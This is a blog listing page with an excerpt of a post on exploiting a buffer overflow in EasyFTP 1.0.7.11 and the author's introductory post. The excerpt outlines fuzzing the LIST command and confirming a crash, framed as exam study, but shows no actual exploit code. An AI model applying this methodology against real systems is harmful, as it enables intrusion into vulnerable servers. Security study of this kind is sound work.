Posts

EasyFTP 1.0.7.11 Exploiting FTP with an EggHunter, Limited Space and Custom Shell Code

Image
On my way to studying from Offensive Security's OSCE exam I began to explore exploit-db.com for exploitable applications I could try to recreate. I found EasyFTP 1.0.7.11 and went about trying to own it.


1. Fuzzed using Boo-Fuzz that identified the LIST parameter as being exploitable.


- I found a good Boo-Fuzz tutorial on youtube.

- Note below, that i reviewed several different parameters including user, stor,retr, password and list.  Generally speaking you identify these parameters by reviewing the RFC associated with the application and reviewing a wireshark snippet while regularly interacting with the application. 

(part of Boofuzz python script)



(output of running BooFuzz python script)

- You can see at 407 bytes the script fails to receive response from EasyFTP...i.e. it crashed .  At this point you'd want to confirm this crash by reviewing Immunity and confirm that you see the application crashed. 
























2. Replicated Boo-Fuzz result with Python script
- link to source can b…

Introduction....hell has frozen over and I've finally started a security blog

Image
So.....hell has frozen over and I've finally started a security blog.  My name Aaron aka T0b0rX0r and Robot Security is my home away from 127.0.0.1.  This blog was setup to host my tutorials, exploits, CTF walk throughs and generally my thoughts on security. I am technology professional based out of the Los Angeles region.  I've worked in information technology for 17 years and as of late been focusing on infosec.  I have a background that includes a bachlors in Computer Science from USC, a masters in technology as well as being certified as Offensive Security Certified Processional (OSCP), a Certified Information Security Professional(CISSP),  and a Cisco Certified Network Professional (CCNP).

I'll be working to keep this site up to date with a new article once a week (atleast). I can be reached over twitter (@t0b0rx0r) and on linked-in.  I also host my code (generally exploits) on github  (http://www.github.com/t0b0rx0r) .